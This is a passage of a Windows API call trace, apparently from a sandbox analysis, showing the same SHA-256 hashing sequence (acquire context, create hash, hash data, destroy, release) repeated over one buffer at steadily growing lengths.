Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.015] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0x560, dwFlags=0x0) returned 1 [0176.015] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6beb0 [0176.015] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0176.015] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0176.015] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0176.016] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.016] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x580, dwFlags=0x0) returned 1 [0176.016] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c000 [0176.016] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.016] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0176.016] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0176.017] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.017] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0176.017] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bd00 [0176.017] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.017] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0176.017] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0176.017] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.017] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0176.017] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bf10 [0176.017] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.017] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0176.017] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0176.018] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.018] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0176.018] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6baf0 [0176.018] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.018] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0176.018] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0176.018] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.019] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x600, dwFlags=0x0) returned 1 [0176.019] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bd90 [0176.019] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.019] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0176.019] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0176.019] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.019] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x620, dwFlags=0x0) returned 1 [0176.019] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b7f0 [0176.019] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.019] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0176.019] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0176.020] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.020] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x640, dwFlags=0x0) returned 1 [0176.020] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b9a0 [0176.020] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.020] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0176.020] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0176.020] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.020] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x660, dwFlags=0x0) returned 1 [0176.020] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bf40 [0176.020] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.021] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0176.021] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338239d0) returned 1 [0176.021] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.021] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0x680, dwFlags=0x0) returned 1 [0176.021] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bbb0 [0176.021] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0176.021] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0176.021] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0176.022] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.022] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0176.022] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bdc0 [0176.022] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.022] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0176.022] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823bd0) returned 1 [0176.022] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.022] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0176.022] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b880 [0176.022] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.022] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0176.022] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0176.023] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.023] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0176.023] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b8b0 [0176.023] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.023] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0176.023] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821ed0) returned 1 [0176.024] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.024] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x700, dwFlags=0x0) returned 1 [0176.024] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c030 [0176.024] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.024] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0176.024] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0176.024] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.024] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x720, dwFlags=0x0) returned 1 [0176.024] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b9d0 [0176.024] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.024] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0176.025] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0176.025] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.025] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x740, dwFlags=0x0) returned 1 [0176.025] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b820 [0176.025] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.025] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0176.025] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338226d0) returned 1 [0176.026] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.026] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x760, dwFlags=0x0) returned 1 [0176.026] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c150 [0176.026] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.026] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0176.026] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0176.026] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.026] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x780, dwFlags=0x0) returned 1 [0176.026] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ba00 [0176.026] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.026] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0176.026] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0176.027] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.027] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0176.027] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bf70 [0176.027] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.027] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0176.027] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0176.028] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.028] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0176.028] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c0c0 [0176.028] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.028] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0176.028] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0176.028] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.028] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0176.028] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bd30 [0176.028] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.028] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0176.028] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0176.029] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.029] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x800, dwFlags=0x0) returned 1 [0176.029] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6b8e0 [0176.029] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.029] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0176.029] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0176.029] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.030] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x820, dwFlags=0x0) returned 1 [0176.030] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c2d0 [0176.030] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.030] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0176.030] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0176.030] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.030] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x840, dwFlags=0x0) returned 1 [0176.030] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c180 [0176.030] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.030] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0176.030] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0176.031] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.031] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x860, dwFlags=0x0) returned 1 [0176.031] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bfa0 [0176.031] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.031] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0176.031] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338223d0) returned 1 [0176.031] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.031] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x880, dwFlags=0x0) returned 1 [0176.031] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c1b0 [0176.031] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.032] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0176.032] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0176.032] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.032] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0176.032] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bb80 [0176.032] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.032] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0176.032] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0176.033] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.033] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0176.033] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c060 [0176.033] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.033] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0176.033] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0176.033] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.033] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0176.033] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bc70 [0176.033] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.033] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0176.033] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0176.034] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.034] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x900, dwFlags=0x0) returned 1 [0176.034] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bd60 [0176.034] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.034] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0176.034] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338222d0) returned 1 [0176.035] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.035] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x920, dwFlags=0x0) returned 1 [0176.035] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c0f0 [0176.035] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.035] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0176.035] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0176.035] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.035] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x940, dwFlags=0x0) returned 1 [0176.035] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c1e0 [0176.035] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0176.035] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0176.035] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0176.036] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.036] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x960, dwFlags=0x0) returned 1 [0176.036] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c330 [0176.036] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.036] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0176.036] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0176.036] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.037] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x980, dwFlags=0x0) returned 1 [0176.037] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c240 [0176.037] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.037] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0176.037] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0176.037] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.037] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0176.037] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ba30 [0176.037] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.037] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0176.037] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0176.038] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.038] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0176.038] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6bdf0 [0176.038] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.038] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0176.038] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0176.038] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.038] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0176.038] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c120 [0176.039] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0176.039] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0176.039] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0176.039] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.039] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0176.039] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ba60 [0176.039] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.039] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0176.039] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0176.040] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0176.041] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0176.041] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c270 [0176.041] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0176.041] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0176.041] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0176.041] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: 